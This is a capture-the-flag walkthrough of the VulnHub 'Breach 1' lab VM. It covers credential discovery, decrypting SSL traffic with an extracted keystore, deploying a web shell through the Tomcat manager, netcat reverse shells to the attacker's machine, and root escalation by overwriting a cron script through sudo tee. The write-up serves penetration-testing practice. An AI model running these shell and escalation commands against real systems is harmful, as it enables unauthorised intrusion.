[VULNHUB] Breach 1

This is the first VM of a series. It was really interesting and funny!

PART ONE

First of all I performed an nmap scan but I don’t write here the output because there are 65389 ports open; by the way that was really really strange. There is a port 80 open, so I checked if there was a website running on the VM, so I browsed to http://192.168.110.140 and the website appeared. Looking into the page source I discovered this:

<!------ Y0dkcFltSnZibk02WkdGdGJtbDBabVZsYkNSbmIyOWtkRzlpWldGbllXNW5KSFJo ----->

Seems to be a base64 encoded string so I decoded it and that was the result:

cGdpYmJvbnM6ZGFtbml0ZmVlbCRnb29kdG9iZWFnYW5nJHRh

Another base64 encoded string, I re-decoded it and finally I found something interesting:

pgibbons:damnitfeel$goodtobeagang$ta

An username and a password, maybe they will be useful later. Before go further I tried to scan the website with dirbuster to find some directories and I find the /images one which conatains several images. I downloaded all of them and I checked with exiftool if they had some interesting informations. I discovered that the image bill.png contains coffeestains as a comment. Ok, now I can click on the image at the center of the website page and I will be redirected into another page where I can access the Employeer Portal. Now I need to login and I tried the string recovered into the source page and it worked!

PART TWO

The next step is to analyze the portal. First of all I noticed that there are 3 unread messages into the user inbox so I read it. The first one was sent by the admin who says that all sensitive informations should be posted into the admin portal. The second and the third one talk about the purchase of IDS/IPS system and I found a link for the keystore: http://192.168.110.140/.keystore. I downloaded it because it is really important. Now I switched to “View Account” section and I discovered a comment by this user (Peter Gibbsons), the title of the content is: “SSL implementation test capture”. I found a link for a .pcap file: http://192.168.110.140/impresscms/_SSL_test_phase1.pcap, so I downloaded it. AN useful information into the comment is that:

They told me the alias, storepassword and keypassword are all set to 'tomcat'.

Do you remember the .keystore file? I can extract the private key from it and I can decrypt the traffic. So I use this command to extract the private key:

keytool -importkeystore -srckeystore keystore -destkeystore key.p12 -deststoretype PKCS12 -srcalias tomcat

Now you need to type the destination file password (I used tomcat again) and the source keystore password (which is tomcat) and you will get the private key file. Now open wireshark, go to Settings and under Protocols select SSL. Now click Edit… near RSA key list and press the + and fill the input fields: into IP type 192.168.110.140, into Port type 8443, into Protocol type http, into Key File you need to import the extracted private key and into the Password type tomcat. Press OK and import the .pcap file. If all is correct you should able to see the Client Hello string. Right click on it and follow the SSL stream. I discovered that an user tried to login into /_M@nag3Me/html and used tomcat:Tt\5D8F(#!*u=G)4m7zB as username and password. I decoded the string from Basic Authentication into the GET request. So just try to login: browse to https://192.168.110.140:8443/_M@nag3Me/html and use the username and password discovered before. Now I am logged into the tomcat server.

PART THREE

Now it’s time to get a shell. I can simply deploy a .war file (I used the laudanum one). Once I uploaded the cmd.war file I browsed to https://192.168.110.140:8443/_M@nag3Me/cmd/cmd.jsp. Now I started to listen locally:

sudo nc -lvp 1234

Then I executed the following command into the tomcat server:
nc 192.168.110.2 1234 -e /bin/bash

The I got a bind shell but I need TTY:

python -c 'import pty; pty.spawn("/bin/bash")'

Perfect, now I started to analyze the server. First of all I browsed to /home to see which usernames are available: blumbergh and milton. Do you remember the comment which I found into an image with exiftool? Maybe it can be a password of one of these users. So I tried to login as blumbergh and I used coffeestains as password and it worked! Now I need to escalated my privileges. First of all I checked what the user can run as root:

sudo -l

This is the output:

(root) NOPASSWD: /usr/bin/tee /usr/share/cleanup/tidyup.sh

Let’s check what tidyup.sh is:

cat /usr/share/cleanup/tidyup.sh

This is the important part:

#This script is set to run every 3 minutes as an additional defense measure against hackers.

So I can create a temporary file with bind shell inside, cat it into the shell and use tee to write into the .sh script. So let’s create the file:

echo "nc 192.168.110.2 1235 -e /bin/bash" > /tmp/shell

And perform the trick:

cat /tmp/shell | sudo /usr/bin/tee /usr/share/cleanup/tidyup.sh

Now listen locally:

sudo nc -lvp 1235

And wait for the shell. Once you got it browse to /root and list the files:

ls -al

There is a .flag.txt file, just cat it:

cat .flag.txt

VM rooted and completed!

Advertisements
[VULNHUB] Breach 1

Leave a Reply

Fill in your details below or click an icon to log in:

WordPress.com Logo

You are commenting using your WordPress.com account. Log Out / Change )

Twitter picture

You are commenting using your Twitter account. Log Out / Change )

Facebook photo

You are commenting using your Facebook account. Log Out / Change )

Google+ photo

You are commenting using your Google+ account. Log Out / Change )

Connecting to %s